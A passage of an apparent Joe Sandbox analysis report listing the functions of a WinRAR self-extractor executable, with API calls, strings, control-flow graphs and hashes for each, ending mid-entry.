                                                                                                                                                        • Part of subcall function 00A3EB06: GdipAlloc.GDIPLUS(00000010), ref: 00A3EB0C
                                                                                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3ECB8
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A3ECDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                      • String ID: PNG
                                                                                                                                                      • API String ID: 211097158-364855578
                                                                                                                                                      • Opcode ID: 5e0fb4760e1b48b5900fcc495a802a27d7ffe4c69777e1bf97e7bd71b40e403b
                                                                                                                                                      • Instruction ID: 9c8f9490f12c5f449a5c7c49699d4cd8aeab6863d270279e662e57d52394c7c8
                                                                                                                                                      • Opcode Fuzzy Hash: 5e0fb4760e1b48b5900fcc495a802a27d7ffe4c69777e1bf97e7bd71b40e403b
                                                                                                                                                      • Instruction Fuzzy Hash: 5C316D75600702AFD710DFA1ED4892FBFA8FB84762B040629F905C22A1EB31DC02CAA1
                                                                                                                                                      Function 00A3355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A38781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5C02E116,00000007,?,?,?,00A38751,?,?,?,?,0000000C,00A24426), ref: 00A3879D
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3395A
                                                                                                                                                      • __fprintf_l.LIBCMT ref: 00A33AA7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                                                                                      • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                                                                      • API String ID: 1796436225-285229759
                                                                                                                                                      • Opcode ID: 1d9be029c1fffe5893dd0ceb2ae8c4fa834644da0e060ef904cf33f7a931dab0
                                                                                                                                                      • Instruction ID: 03e49321a8c6ee8ffa55a8b894adbfa1650fda68d47666edc9f92335e2b303a6
                                                                                                                                                      • Opcode Fuzzy Hash: 1d9be029c1fffe5893dd0ceb2ae8c4fa834644da0e060ef904cf33f7a931dab0
                                                                                                                                                      • Instruction Fuzzy Hash: 0352C272904259AFDF24DFA8CD85AEEB7B4FF44310F10052AF906EB281EB719A45CB50
                                                                                                                                                      Function 00A2F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1006 a2f826-a2f841 call a457d8 1009 a2f847-a2f84d 1006->1009 1010 a2f925-a2f935 FindNextFileW 1006->1010 1011 a2f851-a2f864 FindFirstFileW 1009->1011 1012 a2f84f 1009->1012 1013 a2f937-a2f946 GetLastError 1010->1013 1014 a2f948-a2f9fa call a225c3 call a214a7 call a3229d call a21a66 call a37c44 * 3 1010->1014 1011->1014 1015 a2f86a-a2f88e call a3169a 1011->1015 1012->1011 1016 a2f91d-a2f920 1013->1016 1019 a2f9ff-a2fa0a call a45787 1014->1019 1024 a2f890-a2f897 1015->1024 1025 a2f8ac-a2f8b6 1015->1025 1016->1019 1028 a2f899 1024->1028 1029 a2f89c-a2f8aa FindFirstFileW 1024->1029 1030 a2f8b8-a2f8d3 1025->1030 1031 a2f8fd-a2f900 1025->1031 1028->1029 1029->1025 1035 a2f8f4-a2f8fc call a45726 1030->1035 1036 a2f8d5-a2f8ee call a219a9 1030->1036 1031->1014 1034 a2f902-a2f90b GetLastError 1031->1034 1038 a2f91b 1034->1038 1039 a2f90d-a2f910 1034->1039 1035->1031 1036->1035 1038->1016 1039->1038 1044 a2f912-a2f915 1039->1044 1044->1038 1047 a2f917-a2f919 1044->1047 1047->1016
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F830
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F859
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F8A4
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F902
                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F92D
                                                                                                                                                      • GetLastError.KERNEL32(?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F93A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3831798110-0
                                                                                                                                                      • Opcode ID: 86f9398567224a2d5536149227f80a792fef57da56fa382b3b5b0f072a905ff1
                                                                                                                                                      • Instruction ID: 1e674b7cfc821acd2fc1170cd92dc207c9c0b5f96388dc4b5b1fc4057111d4a9
                                                                                                                                                      • Opcode Fuzzy Hash: 86f9398567224a2d5536149227f80a792fef57da56fa382b3b5b0f072a905ff1
                                                                                                                                                      • Instruction Fuzzy Hash: 7D511171904629EFCF54DF68D989AEDB7B4BF09320F5002BAE519E3290D734AA85CF50
                                                                                                                                                      Function 00A2BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A2C342
                                                                                                                                                        • Part of subcall function 00A32095: __EH_prolog3_GS.LIBCMT ref: 00A3209C
                                                                                                                                                        • Part of subcall function 00A257C0: __EH_prolog3.LIBCMT ref: 00A257C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcslen
                                                                                                                                                      • String ID: __tmp_reference_source_
                                                                                                                                                      • API String ID: 1523997010-685763994
                                                                                                                                                      • Opcode ID: 51a70a71181a6a5059b569cbbf8c94af40d52971c87f349577a79bc81467e7a9
                                                                                                                                                      • Instruction ID: 24d9bd8318c2c06371b2b08296453eaac05c6d7cdea3aaabfe623dc2d9b34d27
                                                                                                                                                      • Opcode Fuzzy Hash: 51a70a71181a6a5059b569cbbf8c94af40d52971c87f349577a79bc81467e7a9
                                                                                                                                                      • Instruction Fuzzy Hash: D0D2F670904299AFDF29DF78E990BEEBBB5BF05314F04453EE48A97242D734A948CB50
                                                                                                                                                      Function 00A4ECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002,00000000), ref: 00A4ECCB
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002,00000000), ref: 00A4ECD2
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00A4ECE4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                      • Opcode ID: 8e838b10e4611a6c99ee9bb576da873a7241a685140d67f8d17b0152e595de62
                                                                                                                                                      • Instruction ID: 3d06c5025a95898ab031034cdfbc5fa25d8b4f0f763e1acabe1009ceff259cca
                                                                                                                                                      • Opcode Fuzzy Hash: 8e838b10e4611a6c99ee9bb576da873a7241a685140d67f8d17b0152e595de62
                                                                                                                                                      • Instruction Fuzzy Hash: 38E0B636000708AFCF51EF94DE49A593B69FF91792B040424FD559A166CB36ED52DB80
                                                                                                                                                      Function 00A3B76F Relevance: .4, Instructions: 353COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: ec9228cf0bbfc74fc78fa64574f07eabb6230b4335d1bef3aec45af12d34e3b3
                                                                                                                                                      • Instruction ID: aacc9cc05ed986bbeb1e46129bbb9bf2f2de8aeac5537bde4a349b741b3e4a06
                                                                                                                                                      • Opcode Fuzzy Hash: ec9228cf0bbfc74fc78fa64574f07eabb6230b4335d1bef3aec45af12d34e3b3
                                                                                                                                                      • Instruction Fuzzy Hash: DCE1B471A183458FDB24DF28C984B5BBBE2BF88304F04456DF9899B342D774E945CBA2
                                                                                                                                                      Function 00A40900 Relevance: 88.4, APIs: 43, Strings: 7, Instructions: 935windowfilesleepCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00A4090A
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A40A18
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A40A57
                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A40A71
                                                                                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00A40A84
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00A40A92
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00A40A9C
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A40ADE
                                                                                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00A40B04
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A40B1F
                                                                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A5C6C8), ref: 00A40B32
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00A40B39
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A40C20
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A40C4C
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A40C79
                                                                                                                                                      • GetLastError.KERNEL32(?,00000011), ref: 00A40CD5
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00A40DF9
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A40E06
                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00A75430,00000400,00000001,00000001), ref: 00A40E85
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00A40EA3
                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00A40EDC
                                                                                                                                                      • WaitForInputIdle.USER32(?,00002710), ref: 00A40F0B
                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00A40F25
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00A75430,00000400), ref: 00A40F61
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00A75430,00000400), ref: 00A40F6D
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A41072
                                                                                                                                                        • Part of subcall function 00A21E1F: GetDlgItem.USER32(?,?), ref: 00A21E34
                                                                                                                                                        • Part of subcall function 00A21E1F: ShowWindow.USER32(00000000), ref: 00A21E3B
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000065,00A5C6C8), ref: 00A4108A
                                                                                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00A41093
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A410A2
                                                                                                                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00A41422
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A41436
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A410B1
                                                                                                                                                        • Part of subcall function 00A3E265: __EH_prolog3_GS.LIBCMT ref: 00A3E26C
                                                                                                                                                        • Part of subcall function 00A3E265: ShowWindow.USER32(?,00000000,00000038), ref: 00A3E294
                                                                                                                                                        • Part of subcall function 00A3E265: GetWindowRect.USER32(?,?), ref: 00A3E2D8
                                                                                                                                                        • Part of subcall function 00A3E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00A3E373
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4114F
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00010447), ref: 00A41284
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,16050E2A), ref: 00A4129D
                                                                                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00A412A6
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A412BE
                                                                                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00A412E6
                                                                                                                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A4135D
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A41371
                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00A415A7
                                                                                                                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A415E8
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4160D
                                                                                                                                                        • Part of subcall function 00A41D4F: __EH_prolog3_GS.LIBCMT ref: 00A41D59
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                                                                                                                      • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                                                                                                                      • API String ID: 3616063595-3000381960
                                                                                                                                                      • Opcode ID: b45c9fd17c0056533255799db510af8dbea123ee5f015da2422d73d395dfb733
                                                                                                                                                      • Instruction ID: 640ed61f282a4b1507391a51cccd885a0300b26df923e9a1ea706512231ff59f
                                                                                                                                                      • Opcode Fuzzy Hash: b45c9fd17c0056533255799db510af8dbea123ee5f015da2422d73d395dfb733
                                                                                                                                                      • Instruction Fuzzy Hash: F272E274D00358EEEB20EBB4DD49FEE7BB8AB51300F008568F109B7192D7B45A86DB61
                                                                                                                                                      Function 00A36D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 379 a36d7b-a36dd1 call a45b20 GetModuleHandleW 382 a36dd3-a36de3 GetProcAddress 379->382 383 a36e28-a3708c 379->383 384 a36de5-a36dfb 382->384 385 a36dfd-a36e0d GetProcAddress 382->385 386 a37092-a3709d call a4e50e 383->386 387 a3719b 383->387 384->385 385->383 388 a36e0f-a36e24 385->388 386->387 396 a370a3-a370b8 call a313f9 386->396 389 a3719d-a371be call a313f9 call a32117 387->389 388->383 404 a371c0-a371cc call a3067e 389->404 402 a370ba 396->402 403 a370bd-a370d5 CreateFileW 396->403 402->403 405 a37186-a37199 CloseHandle call a21a66 403->405 406 a370db-a370e7 SetFilePointer 403->406 411 a37203-a37234 call a214a7 call a3229d call a21a66 call a2ed1f 404->411 412 a371ce-a371dc call a36c5e 404->412 405->389 406->405 408 a370ed-a37107 ReadFile 406->408 408->405 413 a37109-a37114 408->413 445 a37239-a3723c 411->445 412->411 423 a371de-a37201 CompareStringW 412->423 417 a373f2-a373f7 call a45ce1 413->417 418 a3711a-a3714d call a214a7 413->418 429 a37161-a37174 call a36366 418->429 423->411 427 a3723e-a37242 423->427 427->404 431 a37248 427->431 436 a37176-a37181 call a21a66 * 2 429->436 437 a3714f-a37156 429->437 434 a3724c-a37250 431->434 438 a37252 434->438 439 a37296-a37298 434->439 436->405 443 a3715b-a3715c call a36c5e 437->443 444 a37158 437->444 442 a37254-a3728a call a214a7 call a3229d call a21a66 call a2ed1f 438->442 446 a3729e-a372b1 call a32187 call a3067e 439->446 447 a373bd-a373ef call a21a66 * 2 call a45734 439->447 481 a37294 442->481 482 a3728c-a37290 442->482 443->429 444->443 445->427 453 a3724a 445->453 464 a372b3-a37330 call a36c5e * 2 call a34318 call a36a25 call a34318 call a214a7 call a3ecf5 call a21549 446->464 465 a37332-a37366 call a36a25 AllocConsole 446->465 453->434 483 a373b0-a373b7 call a21549 ExitProcess 464->483 476 a37368-a373a7 GetCurrentProcessId AttachConsole call a37441 call a37436 GetStdHandle WriteConsoleW Sleep FreeConsole 465->476 477 a373ad 465->477 476->477 477->483 481->439 482->442 486 a37292 482->486 486->439
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32,5C02E116), ref: 00A36DC7
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A36DD9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A36E03
                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A370CA
                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A370DF
                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00A370FF
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A37187
                                                                                                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00A371F8
                                                                                                                                                      • AllocConsole.KERNEL32 ref: 00A3735E
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A37368
                                                                                                                                                      • AttachConsole.KERNEL32(00000000), ref: 00A3736F
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00A3738F
                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 00A37396
                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00A373A1
                                                                                                                                                      • FreeConsole.KERNEL32 ref: 00A373A7
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00A373B7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                                                                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                      • API String ID: 2644799563-3298887752
                                                                                                                                                      • Opcode ID: fa1c723f24d8bef76f896c6afc3a6691e75a2ccb8a9ab0fa9c106b9294a1ffbf
                                                                                                                                                      • Instruction ID: 1dd918a7519e6951fa7fb8175ee26e11642518a1fcc27f354870f93b43c26c42
                                                                                                                                                      • Opcode Fuzzy Hash: fa1c723f24d8bef76f896c6afc3a6691e75a2ccb8a9ab0fa9c106b9294a1ffbf
                                                                                                                                                      • Instruction Fuzzy Hash: 41F15AB1404388ABDB30EFA4DD49BDE3BA9BF05316F504219FD099B291DB70964DCB91
                                                                                                                                                      Function 00A43572 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A40678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
                                                                                                                                                        • Part of subcall function 00A40678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
                                                                                                                                                        • Part of subcall function 00A40678: IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
                                                                                                                                                        • Part of subcall function 00A40678: TranslateMessage.USER32(?), ref: 00A406BC
                                                                                                                                                        • Part of subcall function 00A40678: DispatchMessageW.USER32(?), ref: 00A406C6
                                                                                                                                                      • GetDlgItem.USER32(00000068,00000000), ref: 00A43595
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00A3FD20,00000001,?,?), ref: 00A435BA
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A435C9
                                                                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A5C6C8), ref: 00A435D7
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A435F1
                                                                                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4360B
                                                                                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4364F
                                                                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A43662
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A43675
                                                                                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4369C
                                                                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A5C860), ref: 00A436AB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
